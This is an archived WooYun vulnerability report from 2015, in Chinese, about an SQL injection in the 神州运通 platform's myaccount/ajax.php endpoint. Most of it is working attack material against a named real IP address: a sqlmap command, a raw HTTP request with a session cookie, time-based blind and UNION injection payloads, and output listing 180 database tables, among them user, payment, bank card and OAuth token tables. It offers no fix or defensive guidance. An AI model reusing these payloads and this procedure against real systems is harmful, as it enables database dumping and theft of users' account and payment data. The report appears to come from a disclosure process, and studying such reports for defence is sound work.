乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-02: 细节已通知厂商并且等待厂商处理中 2015-06-05: 厂商已经确认,细节仅向厂商公开 2015-06-15: 细节向核心白帽子及相关领域专家公开 2015-06-25: 细节向普通白帽子公开 2015-07-05: 细节向实习白帽子公开 2015-07-20: 细节向公众公开
神州运通应用平台SQL注入可脱裤,会员登录使用神州币冲话费、QB等系列敏感操作。
sqlmap.py -r 1.txt -p cur_sel --dbs
POST /myaccount/ajax.php HTTP/1.1Content-Length: 58Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://222.73.36.228:80/Cookie: PHPSESSID=sk3b63h5d3lhqsn0aamcvle5e1Host: 222.73.36.228Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*cur_sel=0&pid=1%20AND%203*2*1%3d6%20AND%20744%3d744&type=4
Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cur_sel=0&pid=1 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))FjDk)-- oDxw21=6 AND 744=744&type=4 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: cur_sel=0&pid=1 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x7162716a71,0x744b6361546579637a53,0x71786a6a71),NULL-- 21=6 AND 744=744&type=4---web application technology: Apacheback-end DBMS: MySQL 5.0.12available databases [2]:[*] information_schema[*] splatform
web application technology: Apacheback-end DBMS: MySQL 5.0.12Database: splatform[180 tables]+---------------------------------------+| execution_time || s_account || s_admin_subs || s_ali_pay_rec || s_app || s_app_error_log || s_app_order || s_app_partner || s_app_products || s_barcode_merchant || s_barcode_merchant_info || s_barcode_product || s_beta_register || s_blog_cat || s_blog_comment || s_blog_comment_log || s_blog_post_relationship || s_blog_posts || s_blog_search || s_blog_tags || s_bonus_count || s_bonus_pay_list || s_cep_order || s_chanet_activity || s_city || s_code_sales_list || s_coupon || s_coupon_code || s_cpa_list || s_cronUpdate || s_cronupdate || s_ctrip_flight || s_ctrip_hotel || s_dooland_card_code || s_dooland_cat || s_dooland_products || s_ej_order || s_ej_order_item || s_ej_products || s_exchange || s_exchange_bonus_logs || s_exchange_out || s_exchange_record || s_exchange_sum || s_f_avatar || s_f_bad_words || s_f_cat_daily_status || s_f_category || s_f_category_stats || s_f_cron_live || s_f_daily_status || s_f_parent_user || s_f_profile || s_f_reply || s_f_topic || s_faq_cat || s_faq_list || s_faq_map || s_feedback || s_file_list || s_frozen_list || s_game_attempt || s_game_chance || s_game_coupon_codes || s_game_coupon_list || s_game_list || s_game_model || s_game_prize || s_game_user_gain || s_game_winner || s_gift_bag || s_god_badge || s_goods || s_goods_detail || s_ips_company || s_ips_sales_list || s_j8_cat_list || s_j8_com_cat_list || s_j8_company_list || s_j8_product_list || s_j8_region_list || s_j8_sale_list || s_j8_sale_list_old1 || s_j8_server_list || s_json_bk || s_kango_cardkinds || s_kango_cinemas || s_kango_sale_list || s_log_name_list || s_login_attempt || s_luck100_code || s_luck100_dice || s_luck100_user_gain || s_merchant || s_merchant_bus_ad || s_merchant_cat || s_merchant_coupon || s_merchant_ext || s_merchant_info || s_merchant_prom_ad || s_my_coupon || s_nav || s_nav_list || s_nonce_data || s_oauth_access_token || s_oauth_quest_token || s_ofcard_product_list || s_ofcard_products || s_ofcard_sales_list || s_order || s_order_item || s_order_session || s_page_scheduler || s_pages || s_pay || s_pay_channel || s_pay_info || s_permission_list || s_prepaid_card || s_prepaid_card_name || s_prepaid_event || s_questionnaire || s_reg_user || s_regions || s_rmb_order || s_rmb_to_ceb || s_rmb_to_order || s_rmb_trans || s_sAlbum || s_sContent_bk || s_sCss || s_sCss_preview || s_sCss_update || s_sPlugin || s_sVideo || s_shipping_addr || s_site_log || s_sys_config || s_sys_config_file || s_template || s_template_parent || s_transaction || s_tutorial_cat || s_tutorial_img || s_tutorial_item || s_txtlink_cat || s_txtlink_list || s_union_game || s_union_game_bonus || s_union_game_bonus_transaction || s_union_game_class || s_union_game_comment || s_union_game_dynamic || s_union_game_meed || s_union_game_meed_class || s_union_game_meed_order || s_union_game_money_transaction || s_union_game_order || s_union_game_recharge || s_union_game_score_error || s_union_user_card || s_user || s_user_bankcard || s_user_godc || s_user_groups || s_user_info || s_user_permissions || s_user_personal_info || s_user_plugin || s_user_posorder || s_user_posorderrecall || s_user_union_game || s_wifi_code_cat || s_wifi_codes || s_xmastree_lamp || s_xmastree_user_gain || s_yiqifa_cat || s_yiqifa_product || s_yiqifa_sales || test |+---------------------------------------+Database: information_schema[37 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_TRX || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+
你懂的~
危害等级:中
漏洞Rank:8
确认时间:2015-06-05 18:26
暂无
